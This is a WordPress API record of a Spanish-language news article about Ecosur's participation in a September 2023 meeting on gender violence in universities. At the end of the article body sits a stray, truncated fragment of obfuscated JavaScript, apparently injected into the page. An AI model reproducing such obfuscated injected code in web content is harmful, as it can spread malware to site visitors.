{"id":9985,"date":"2023-05-11T03:46:47","date_gmt":"2023-05-11T03:46:47","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9985"},"modified":"2023-05-11T03:46:48","modified_gmt":"2023-05-11T03:46:48","slug":"participara-ecosur-en-encuentro-sobre-violencia-de-genero-en-educacion-superior","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9985","title":{"rendered":"Participar\u00e1 Ecosur en Encuentro sobre Violencia de Genero en Educaci\u00f3n Superior"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/IMG_20230510_112310-1024x768.jpg\" alt=\"\" class=\"wp-image-9986\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/IMG_20230510_112310-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/IMG_20230510_112310-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/IMG_20230510_112310-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/IMG_20230510_112310-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/IMG_20230510_112310.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal San Crist\u00f3bal de Las Casas.- El VII Encuentro de Discusi\u00f3n y An\u00e1lisis de Estrategias de Intervenci\u00f3n a la Violencia por Motivos de G\u00e9nero en las Instituciones de Educaci\u00f3n Superior, se llevar\u00e1 a cabo del 12 al 14 de septiembre de 2023, inform\u00f3 Ang\u00e9lica Evangelista Garc\u00eda, investigadora del Colegia de la Frontera Sur, Unidad San Crist\u00f3bal.En entrevista, dijo que este a\u00f1o el tema es \u201cDi\u00e1logos Cr\u00edticos sobre la Diversidad e Inclusi\u00f3n\u201d, donde se va discutir diversidades de edad, g\u00e9nero, etnias, capacidades diferentes, y c\u00f3mo esto tiene relaci\u00f3n con la violencia de g\u00e9nero en las universidades y las instituciones en general de educaci\u00f3n superior.\u201cEsto tendr\u00e1 lugar en la Universidad de Guadalajara, va ser un evento hibrido, presencial y virtual; el 16 de mayo cierra la convocatoria para ponencias, hay que entrar a la p\u00e1gina del evento o de Ecosur, ah\u00ed encuentran la convocatoria, tenemos tres ejes tem\u00e1ticos este a\u00f1o: argumentaci\u00f3n jur\u00eddica y acceso a la justicia, autocuidado feminista, salud sicosocial y activismo y expresiones culturales\u201d.Se\u00f1al\u00f3 que es un evento dirigido a la comunidad estudiantil, y para todas las personas interesadas en la prevenci\u00f3n de la violencia en instituciones de educaci\u00f3n superior, \u201cesto no es tan reciente, tenemos diferentes manifestaciones de denuncias de violencia contra las estudiantes, eso se da un muchas universidades de todo el pa\u00eds y es algo que nos convoca a discutir estrategias formales y no formales para acabar con este problema\u201d\u201cSomos varias instituciones, poco m\u00e1s de 15 que convocamos, originalmente fue una iniciativa de la Universidad Aut\u00f3noma Metropolitana, justo ahora acaba de concluir, hace poco m\u00e1s de un mes, las estudiantes, que pararon labores en todas las unidades acad\u00e9micas por la falta de atenci\u00f3n y omisi\u00f3n en la atenci\u00f3n de casos de violencia contra las estudiantes, y ellas empezaron este evento y se han ido sumando en el camino diferentes instituciones\u201d, finaliz\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal San Crist\u00f3bal de Las Casas.- El VII Encuentro de Discusi\u00f3n y An\u00e1lisis de Estrategias de Intervenci\u00f3n a la Violencia por Motivos de G\u00e9nero en las Instituciones de Educaci\u00f3n Superior, se llevar\u00e1 a cabo del 12 al 14 de septiembre de 2023, inform\u00f3 Ang\u00e9lica Evangelista Garc\u00eda, investigadora del Colegia de la Frontera Sur, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9986,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-9985","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9985","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9985"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9985\/revisions"}],"predecessor-version":[{"id":9987,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9985\/revisions\/9987"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9986"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9985"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9985"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9985"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}